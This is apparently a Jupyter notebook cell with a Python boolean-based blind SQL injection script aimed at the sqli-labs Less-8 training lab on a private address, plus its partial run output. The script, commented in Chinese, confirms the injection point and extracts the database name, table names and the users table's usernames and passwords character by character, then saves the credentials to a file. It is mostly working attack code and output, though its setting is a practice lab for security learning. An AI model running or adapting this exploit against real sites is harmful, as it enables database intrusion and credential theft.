In [3]:
import requests
import string

# 目标URL - Sqli-labs第8关
url = "http://192.168.41.130/sqli-labs/Less-8/"

def check_injection(payload):
    """
    检查SQL注入是否成功
    
    参数:
        payload: SQL注入payload字符串
    
    返回:
        bool: 如果页面显示"You are in"返回True，否则返回False
    
    功能:
        1. 发送GET请求到目标URL
        2. 检查响应中是否包含成功标识
        3. 返回布尔值表示注入是否成功
    """
    try:
        # 发送HTTP GET请求
        response = requests.get(url, params={'id': payload}, timeout=5)
        
        # 检查响应中是否包含成功关键词
        # Sqli-labs第8关成功时会显示"You are in..........."
        return "You are in" in response.text
    except requests.RequestException as e:
        # 请求异常处理
        print(f"请求失败: {e}")
        return False
        
def get_database_name():
    """获取数据库名"""
    db_name = ""

    # 先获取长度
    length = 0
    for i in range(1, 20):
        payload = f"1' and length(database())={i} and '1'='1"
        if check_injection(payload):
            length = i
            print(f"数据库名长度: {length}")
            break

    # 逐字符猜解
    for pos in range(1, length + 1):
        for char in string.ascii_lowercase + string.digits:
            payload = f"1' and ascii(substr(database(),{pos},1))={ord(char)} and '1'='1"
            if check_injection(payload):
                db_name += char
                print(f"第{pos}位: {char} → 当前: {db_name}")
                break

    return db_name

def get_table_names():
    """
    获取当前数据库中的所有表名
    
    返回:
        list: 包含所有表名的列表
    
    攻击原理:
        1. 利用information_schema.tables系统表
        2. 逐表猜解表名长度和每个字符
        3. 使用database()函数获取当前数据库名
    
    步骤:
        1. 先猜解表的数量
        2. 对每个表猜解表名长度
        3. 对每个字符使用ASCII值猜解
    """
    tables = []  # 存储表名的列表
    
    print("=" * 50)
    print("开始获取表信息...")
    print("=" * 50)
    
    # ==================== 第一步：获取表的数量 ====================
    print("\n[步骤1] 获取表数量...")
    table_count = 0
    
    # 循环猜测表的数量，假设最多50个表
    for i in range(1, 50):
        # 构造payload：检查当前数据库的表数量是否等于i
        payload = (
            f"1' and (select count(table_name) "
            f"from information_schema.tables "
            f"where table_schema=database())={i} and '1'='1"
        )
        
        if check_injection(payload):
            table_count = i  # 找到正确的表数量
            print(f"✓ 发现表数量: {table_count}")
            break
    else:
        # for循环正常结束（没有被break）
        print("✗ 未能确定表数量")
        return tables
    
    # ==================== 第二步：获取每个表名 ====================
    print(f"\n[步骤2] 开始获取{table_count}个表的表名...")
    
    # 遍历每个表（从第0个开始）
    for table_index in range(0, table_count):
        print(f"\n--- 正在获取第{table_index + 1}个表 ---")
        table_name = ""  # 存储当前表名
        
        # ---------- 2.1 先猜解表名长度 ----------
        table_length = 0
        for length in range(1, 50):  # 假设表名最长49个字符
            # 构造payload：检查第table_index个表的表名长度是否等于length
            payload = (
                f"1' and length((select table_name "
                f"from information_schema.tables "
                f"where table_schema=database() "
                f"limit {table_index},1))={length} and '1'='1"
            )
            
            if check_injection(payload):
                table_length = length
                print(f"  表名长度: {table_length}")
                break
        
        if table_length == 0:
            print(f"  ✗ 无法确定表名长度，跳过此表")
            continue
        
        # ---------- 2.2 逐字符猜解表名 ----------
        print(f"  开始猜解表名字符...")
        
        # 可能的字符集：小写字母、数字、下划线（表名常见字符）
        charset = string.ascii_lowercase + string.digits + '_'
        
        # 对表名的每个位置进行猜解
        for position in range(1, table_length + 1):
            char_found = False  # 标记是否找到当前字符
            
            # 遍历字符集进行匹配
            for char in charset:
                # 构造payload：检查第position个字符的ASCII值是否等于char的ASCII值
                payload = (
                    f"1' and ascii(substr((select table_name "
                    f"from information_schema.tables "
                    f"where table_schema=database() "
                    f"limit {table_index},1),{position},1))={ord(char)} and '1'='1"
                )
                
                if check_injection(payload):
                    table_name += char  # 找到匹配的字符
                    print(f"    位置{position}: '{char}' → 当前: {table_name}")
                    char_found = True
                    break  # 找到字符后跳出内层循环
            
            if not char_found:
                # 如果字符集中没有找到，尝试大写字母和其他字符
                for char in string.ascii_uppercase + '-':
                    payload = (
                        f"1' and ascii(substr((select table_name "
                        f"from information_schema.tables "
                        f"where table_schema=database() "
                        f"limit {table_index},1),{position},1))={ord(char)} and '1'='1"
                    )
                    
                    if check_injection(payload):
                        table_name += char
                        print(f"    位置{position}: '{char}' → 当前: {table_name}")
                        char_found = True
                        break
        
        # 将获取到的表名添加到列表
        if table_name:
            tables.append(table_name)
            print(f"  ✓ 表{table_index + 1}: {table_name}")
        else:
            print(f"  ✗ 无法获取表名")
    
    print("\n" + "=" * 50)
    print("表信息获取完成！")
    print(f"发现表: {', '.join(tables)}")
    print("=" * 50)
    
    return tables

def get_user_credentials():
    """
    获取users表中的用户凭证（用户名和密码）
    
    返回:
        list: 包含(用户名, 密码)元组的列表
    
    攻击原理:
        1. 先获取users表中的记录数量
        2. 对每条记录分别获取用户名和密码
        3. 使用limit子句指定获取哪条记录
    
    注意:
        - 假设表名为'users'（根据前期信息收集）
        - 假设有username和password字段
    """
    users = []  # 存储用户凭证的列表
    
    print("\n" + "=" * 50)
    print("开始获取用户凭证...")
    print("=" * 50)
    
    # ==================== 第一步：获取用户数量 ====================
    print("\n[步骤1] 获取用户数量...")
    user_count = 0
    
    for i in range(1, 50):  # 假设最多49个用户
        # 构造payload：检查users表中的记录数量
        payload = f"1' and (select count(*) from users)={i} and '1'='1"
        
        if check_injection(payload):
            user_count = i
            print(f"✓ 用户数量: {user_count}")
            break
    else:
        print("✗ 未能确定用户数量")
        return users
    
    # ==================== 第二步：获取每个用户的凭证 ====================
    print(f"\n[步骤2] 开始获取{user_count}个用户的凭证...")
    
    for user_index in range(0, user_count):
        print(f"\n--- 正在获取第{user_index + 1}个用户 ---")
        username = ""
        password = ""
        
        # ---------- 2.1 获取用户名 ----------
        print("  获取用户名...")
        
        # 先猜解用户名长度
        username_length = 0
        for length in range(1, 30):  # 假设用户名最长29字符
            payload = (
                f"1' and length((select username "
                f"from users limit {user_index},1))={length} and '1'='1"
            )
            
            if check_injection(payload):
                username_length = length
                print(f"    用户名长度: {username_length}")
                break
        
        if username_length == 0:
            print("  ✗ 无法确定用户名长度")
            continue
        
        # 逐字符猜解用户名
        for pos in range(1, username_length + 1):
            for char in string.ascii_letters + string.digits:
                payload = (
                    f"1' and ascii(substr((select username "
                    f"from users limit {user_index},1),{pos},1))={ord(char)} and '1'='1"
                )
                
                if check_injection(payload):
                    username += char
                    print(f"    位置{pos}: '{char}' → 当前: {username}")
                    break
        
        # ---------- 2.2 获取密码 ----------
        print("  获取密码...")
        
        # 猜解密码长度
        password_length = 0
        for length in range(1, 50):  # 假设密码最长49字符
            payload = (
                f"1' and length((select password "
                f"from users limit {user_index},1))={length} and '1'='1"
            )
            
            if check_injection(payload):
                password_length = length
                print(f"    密码长度: {password_length}")
                break
        
        if password_length == 0:
            print("  ✗ 无法确定密码长度")
            continue
        
        # 逐字符猜解密码（密码通常是MD5哈希，包含字母和数字）
        for pos in range(1, password_length + 1):
            for char in string.ascii_letters + string.digits:
                payload = (
                    f"1' and ascii(substr((select password "
                    f"from users limit {user_index},1),{pos},1))={ord(char)} and '1'='1"
                )
                
                if check_injection(payload):
                    password += char
                    # 不显示每个字符的进度，避免输出过多
                    if pos % 10 == 0 or pos == password_length:
                        print(f"    密码进度: {pos}/{password_length} 字符")
                    break
        
        # 存储当前用户的凭证
        users.append((username, password))
        print(f"  ✓ 用户{user_index + 1}: {username}:{password}")
    
    print("\n" + "=" * 50)
    print("用户凭证获取完成！")
    print("=" * 50)
    
    # 格式化输出所有用户凭证
    print("\n【获取到的用户凭证】")
    print("-" * 40)
    print(f"{'序号':<5} {'用户名':<15} {'密码':<32}")
    print("-" * 40)
    for i, (user, pwd) in enumerate(users, 1):
        print(f"{i:<5} {user:<15} {pwd:<32}")
    print("-" * 40)
    
    return users

def main():
    """
    主函数 - 执行完整的布尔盲注攻击流程
    """
    print("=" * 60)
    print("Sqli-labs 第8关 - 布尔盲注攻击脚本")
    print("=" * 60)
    
    # 测试注入是否可用
    print("\n[阶段1] 测试注入点...")
    test_payload = "1' and '1'='1"
    if check_injection(test_payload):
        print("✓ 注入点可用")
    else:
        print("✗ 注入点不可用，请检查环境")
        return
    # 获取数据库信息
    db_name = get_database_name()
    print(f"数据库名: {db_name}") 
    
    # 获取表信息
    tables = get_table_names()
    
    # 如果找到users表，获取用户凭证
    if tables and any('users' in table.lower() for table in tables):
        print("\n发现users表，开始提取用户凭证...")
        
        # 在实际环境中，应该根据找到的表名动态调整
        # 这里假设表名就是'users'
        users = get_user_credentials()
        
        # 保存结果到文件
        if users:
            with open('credentials.txt', 'w') as f:
                f.write("获取到的用户凭证\n")
                f.write("=" * 40 + "\n")
                for username, password in users:
                    f.write(f"{username}:{password}\n")
            print(f"\n✓ 凭证已保存到 credentials.txt")
    else:
        print("\n未找到users表或表信息为空")
    
    print("\n" + "=" * 60)
    print("攻击脚本执行完成！")
    print("=" * 60)

if __name__ == "__main__":
    # 执行主函数
    main()
    
    # 使用说明
    print("\n【使用说明】")
    print("1. 确保sqli-labs环境正在运行")
    print("2. 检查url变量中的地址是否正确")
    print("3. 本脚本仅用于授权测试和安全研究")
    print("4. 实际攻击中可能需要调整超时时间和字符集")

Sqli-labs 第8关 - 布尔盲注攻击脚本

[阶段1] 测试注入点...
✓ 注入点可用
数据库名长度: 8
第1位: s → 当前: s
第2位: e → 当前: se
第3位: c → 当前: sec
第4位: u → 当前: secu
第5位: r → 当前: secur
第6位: i → 当前: securi
第7位: t → 当前: securit
第8位: y → 当前: security
数据库名: security
开始获取表信息...

[步骤1] 获取表数量...
✓ 发现表数量: 4

[步骤2] 开始获取4个表的表名...

--- 正在获取第1个表 ---
  表名长度: 6
  开始猜解表名字符...
    位置1: 'e' → 当前: e
    位置2: 'm' → 当前: em
    位置3: 'a' → 当前: ema
    位置4: 'i' → 当前: emai
    位置5: 'l' → 当前: email
    位置6: 's' → 当前: emails
  ✓ 表1: emails

--- 正在获取第2个表 ---
  表名长度: 8
  开始猜解表名字符...
    位置1: 'r' → 当前: r
    位置2: 'e' → 当前: re
    位置3: 'f' → 当前: ref
    位置4: 'e' → 当前: refe
    位置5: 'r' → 当前: refer
    位置6: 'e' → 当前: refere
    位置7: 'r' → 当前: referer
    位置8: 's' → 当前: referers
  ✓ 表2: referers

--- 正在获取第3个表 ---
  表名长度: 7
  开始猜解表名字符...
    位置1: 'u' → 当前: u
    位置2: 'a' → 当前: ua
    位置3: 'g' → 当前: uag
    位置4: 'e' → 当前: uage
    位置5: 'n' → 当前: uagen
    位置6: 't' → 当前: uagent
    位置7: 's' → 当前: uagents
  ✓ 表3: uagents

--- 正在获取第4个表 ---
  表名长度: 5
  开始猜解表名字符..